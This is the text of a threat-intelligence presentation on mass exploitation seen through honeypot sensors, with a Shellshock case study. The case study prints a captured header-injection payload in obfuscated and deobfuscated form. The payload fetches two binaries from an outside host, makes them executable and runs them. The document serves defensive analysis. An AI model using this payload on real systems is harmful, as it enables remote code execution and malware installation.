Global attack patterns to improve threat detection Curt Barnard, Software Implementation Engineer

• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

Crawlers, bots, and automated exploitation scripts crowd the internet

Up to 80% of all site traffic generated by bots [1]

Vulnerabilities in common, core programming libraries make juicy

targets for malicious actors

[1] https://www.incapsula.com/blog/bot-traffic-report-2014.html

The internet is noisy

• Many malicious actors employ a “spray and pray”

methodology

• Recent examples: Heart bleed, Shellshock, weak SSH

credentials

• Commoditization of access is prevalent with non-targeted

attacks

How do you get warnings of attacks?

Endgame employs a SensorNet of dummy web services to collect at-scale attack data

– Multiple VPS providers

– Multiple geographic regions

– Multiple OS configurations

– Centralized logging

When hackers talk, we listen

Shellshock Attack

We have observed a bad actor executing:- An obfuscated php code - By leveraging a shellshock vulnerability- Via multiple client IP addresses

• Bash vulnerability related to variable assignment• Can stuff it in HTTP headers

() { :;} ; <commands>

Shellshock PrefixCommand sequence

How Shellshock is formatted?

() { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'

Obfuscated php code

This code is unclear to confuse pattern matchers, but not very effective against humans

system("uptime");file_put_contents("AS1", fopen("http://x5d.su/x/AS1", 'r'));file_put_contents("AS2", fopen("http://x5d.su/x/AS2", 'r'));system("chmod 777 AS1");system("chmod 777 AS2");system("AS1");system("AS2");

Deobfuscated php code

This is the definition of spray and pray, where the bad actor hopes to get something by shotgun approach

• Attackers are indiscriminately targeting web services with

ShellShock

• They are using advanced techniques to prevent automated

detection of TTP’s

• Sophistication of these attacks have increased over time

• Several (likely compromised) sources using the same

infrastructure

The shocking summary

• Evolution of methods used in mass exploitation

• Adoption of these methods by malicious actors

• Adaptation of these actors to defensive measures

Key Takeaways

For more information contact: egs-info@endgame.com